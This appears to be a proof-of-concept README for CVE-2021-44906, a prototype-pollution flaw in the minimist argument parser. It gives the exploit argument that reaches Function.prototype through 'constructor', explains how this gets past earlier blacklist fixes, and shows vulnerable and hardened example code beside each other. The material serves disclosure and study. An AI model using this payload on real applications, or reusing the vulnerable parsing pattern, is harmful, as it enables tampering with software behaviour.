# CVE-2021-44906
Originally from: https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/minimist%20PoC.zip
## Run
```
npm run hack
```
And you will see that any function's `done` property has been changed to `true`.
Explanation of the command line `node index.js --_.concat.constructor.prototype.done true`:
- `--` is the hyphen prefix normally used for long command line options.
- `_` is the built-in key in minimist: https://github.com/minimistjs/minimist/blob/v1.2.5/index.js#L37
- `.concat.constructor.prototype.done true` sets `_.concat.constructor.prototype.done` to `true`.
Because `_.concat.constructor` is `Function`, the property `done` is added to `Function.prototype`, so every function inherits it.
The prototype chain is this long because, in the previous fixes, the developer blacklisted `__proto__`, `Array.prototype`, `Object.prototype`, `Number.prototype` and `String.prototype`. So we have to go through `constructor`, which has a `prototype` property and is not blacklisted.
Another example is:
```
npm run hack2
```
However, in the above two examples we can only tamper with values, not redefine functions.
## Cause
In the fix for CVE-2020-7598 (1.2.2), and again in 1.2.3, the developer addressed prototype pollution by checking for `__proto__`, `Array.prototype`, `Object.prototype`, `Number.prototype` and `String.prototype`,
but they forgot to check `Function.prototype`. This is why this exploit can only affect properties of `Function`.
For the fix of this CVE, the developer checks `Function.prototype` as well as `constructor`: https://github.com/minimistjs/minimist/blob/v1.2.6/index.js#L73
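The tampering described in the Cause section, as an added example that is not the PoC's or minimist's own code: a model of minimist's dotted-key walk in the pre-1.2.6 style the text describes, beside a hardened walk that also refuses `constructor` and built-in prototype objects (the names `setKeyVulnerable`, `setKeySafe` and `applyArg` are assumptions).

```javascript
// Added example (not the PoC's or minimist's own code): a model of minimist's
// dotted-key walk in a pre-1.2.6 style, beside a hardened walk that also refuses
// `constructor`, so the path above is cut off before Function.prototype.
function setKeyVulnerable(obj, keys, value) {
  let o = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    if (key === '__proto__') return false;
    if (o[key] === undefined) o[key] = {};
    if (o[key] === Object.prototype || o[key] === Number.prototype ||
        o[key] === String.prototype) o[key] = {};
    if (o[key] === Array.prototype) o[key] = [];
    o = o[key]; // Function.prototype is never checked, so it passes through
  }
  o[keys[keys.length - 1]] = value;
  return true;
}
// Hardened walk: stop at `__proto__`, at a `constructor` that is a function,
// or whenever the path lands on a built-in prototype object.
const BUILTIN_PROTOTYPES = new Set([Object.prototype, Array.prototype,
  Function.prototype, Number.prototype, String.prototype]);
function setKeySafe(obj, keys, value) {
  let o = obj;
  for (let i = 0; i < keys.length; i++) {
    const key = keys[i];
    if (key === '__proto__') return false;
    if (key === 'constructor' && typeof o[key] === 'function') return false;
    if (i === keys.length - 1) { o[key] = value; return true; }
    if (o[key] === undefined) o[key] = {};
    if (BUILTIN_PROTOTYPES.has(o[key])) return false;
    o = o[key];
  }
  return false;
}
// Apply one `--a.b.c value` argument to a fresh argv the way minimist splits it.
function applyArg(setKey, flag, value) {
  const argv = { _: [] };
  const ok = setKey(argv, flag.replace(/^--/, '').split('.'), value);
  return { argv, ok };
}
function demonstrate() {
  const flag = '--_.concat.constructor.prototype.done';
  applyArg(setKeyVulnerable, flag, true);
  const polluted = (function () {}).done === true;
  delete Function.prototype.done; // undo the pollution so the process stays clean
  const blocked = applyArg(setKeySafe, flag, true).ok === false;
  const clean = (function () {}).done === undefined;
  return { polluted, blocked, clean };
}
console.log(demonstrate()); // { polluted: true, blocked: true, clean: true }
```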
## Files
```
[4.0K] /data/pocs/6c84b468bab2ad352b1b5b5ab8075c474c936766
├── [ 666] index.js
├── [4.0K] node_modules
│   └── [4.0K] minimist
│       ├── [4.0K] example
│       │   └── [  69] parse.js
│       ├── [7.9K] index.js
│       ├── [1.0K] LICENSE
│       ├── [ 883] package.json
│       ├── [2.4K] readme.markdown
│       └── [4.0K] test
│           ├── [ 756] all_bool.js
│           ├── [4.1K] bool.js
│           ├── [ 980] dash.js
│           ├── [ 778] default_bool.js
│           ├── [ 588] dotted.js
│           ├── [ 376] kv_short.js
│           ├── [ 779] long.js
│           ├── [ 909] num.js
│           ├── [4.5K] parse.js
│           ├── [ 238] parse_modified.js
│           ├── [1.2K] proto.js
│           ├── [1.6K] short.js
│           ├── [ 328] stop_early.js
│           ├── [2.5K] unknown.js
│           └── [ 191] whitespace.js
├── [ 484] package.json
├── [ 828] package-lock.json
└── [1.6K] README.md

4 directories, 24 files
```